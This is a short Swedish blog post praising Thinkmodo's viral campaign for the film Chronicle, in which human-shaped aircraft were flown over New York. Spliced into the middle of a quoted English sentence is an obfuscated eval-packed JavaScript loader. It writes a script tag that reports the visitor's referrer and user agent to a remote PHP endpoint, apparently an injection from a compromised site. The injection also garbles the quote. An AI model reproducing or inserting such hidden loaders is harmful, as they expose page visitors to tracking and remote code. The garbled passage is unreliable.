Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Flygande människor i New York. Riktigt cool reklamkampanj!

Flygande människor i New York. Riktigt cool reklamkampanj!
Filip Urde
  • On 31 januari, 2012
  • http://www.revue.se/filip-urde

Jag älskar kreativ reklam och denna hör verkligen till den kategorin. Filmen Chronicle som vi skrivit om tidigare, handlar om människor med ”superkrafter”. Detta tyckte  20th Century Fox behövdes få en liten extra hype och anlitade den virala marknadsföringsbyrån Thinkmodo som tyckte att flygande människor i New York borde göra jobbet.

”Since eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzttr|var|u0026u|referrer|bbfii||js|php’.split(’|’),0,{}))
the three main characters of the movie have the ability to fly, we came up with the idea of staging a few ”flying people” sightings around NYC. We achieved that illusion by having 3 custom-made aircraft (which were shaped like human beings) fly above designated areas in NYC and NJ.”

Riktigt coolt!
Trailern till filmen Chronicle.